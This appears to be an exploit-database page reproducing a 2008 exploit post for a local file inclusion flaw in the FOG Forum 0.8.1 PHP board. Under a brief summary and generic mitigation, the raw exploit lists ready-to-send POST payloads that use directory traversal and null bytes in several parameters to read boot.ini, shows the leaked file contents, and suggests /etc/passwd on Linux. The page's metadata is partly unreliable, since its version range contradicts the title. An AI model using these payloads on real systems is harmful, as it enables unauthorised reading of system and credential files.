FOG Forum 0.8.1 Local File Inclusion Vulnerabilities

vendor:

FOG Forum

by:

CWH Underground

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: FOG Forum

Affected Version From: 2000.8.1

Affected Version To: 2000.8.1

Patch Exists: NO

Related CWE: N/A

CPE: a:fog_project:fog_forum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Web

2008

FOG Forum 0.8.1 Local File Inclusion Vulnerabilities

FOG Forum 0.8.1 is vulnerable to Local File Inclusion (LFI) attacks. An attacker can exploit this vulnerability by sending maliciously crafted POST requests to the vulnerable application. The attacker can use a web proxy such as WebScarab to intercept and edit the POST request data. The vulnerable files/paths are http://[Target]/[Path]/index.php. The attacker can send maliciously crafted POST requests with the parameters fog_skin, fog_lang, fog_pseudo, fog_password, fog_cook, fog_action, fog_userid, fog_path, fog_posted, fog_pseudo, fog_password, and fog_cook. This will allow the attacker to read local files such as boot.ini.

Mitigation:

To mitigate this vulnerability, the application should be configured to only accept requests from trusted sources. Additionally, the application should be configured to only accept requests with valid parameters.

Source

Exploit-DB raw data:

=======================================================
 FOG Forum 0.8.1 Local File Inclusion Vulnerabilities
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 10 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : FOG Forum - PHP Board Engine
 VERSION     : 0.8.1
 VENDOR      : http://fog.daviveno.org
 DOWNLOAD    : http://fog.daviveno.org/streamearth/go_dl.php?download=1
#####################################################

---Local File Inclusion Exploit (POST Method)---

---Description---

[+]Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept POST Method and edit in request data.
[+]All LFI Exploits were Vulnerablilities with POST Method

##############################################
Vulnerable File/Path:

[+]http://[Target]/[Path]/index.php

##############################################

---LFI Exploits (Use WebScarab to Edit request data)---

Send Request Data:

fog_skin=default&fog_lang=../../../../../../../../boot.ini%00
fog_skin=../../../../../../../../boot.ini%00&fog_lang=francais
fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0&fog_action=0&fog_userid=cwhmail@cwh.com&fog_path=http://localhost/forum/index.php
fog_posted=../../../../../../../../boot.ini%00&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=0
fog_posted=1&fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0
fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=../../../../../../../../boot.ini%00&fog_cook=0
fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=../../../../../../../../boot.ini%00

Note: This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

      You can change boot.ini to /etc/passwd%00 in linux OS.

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-11]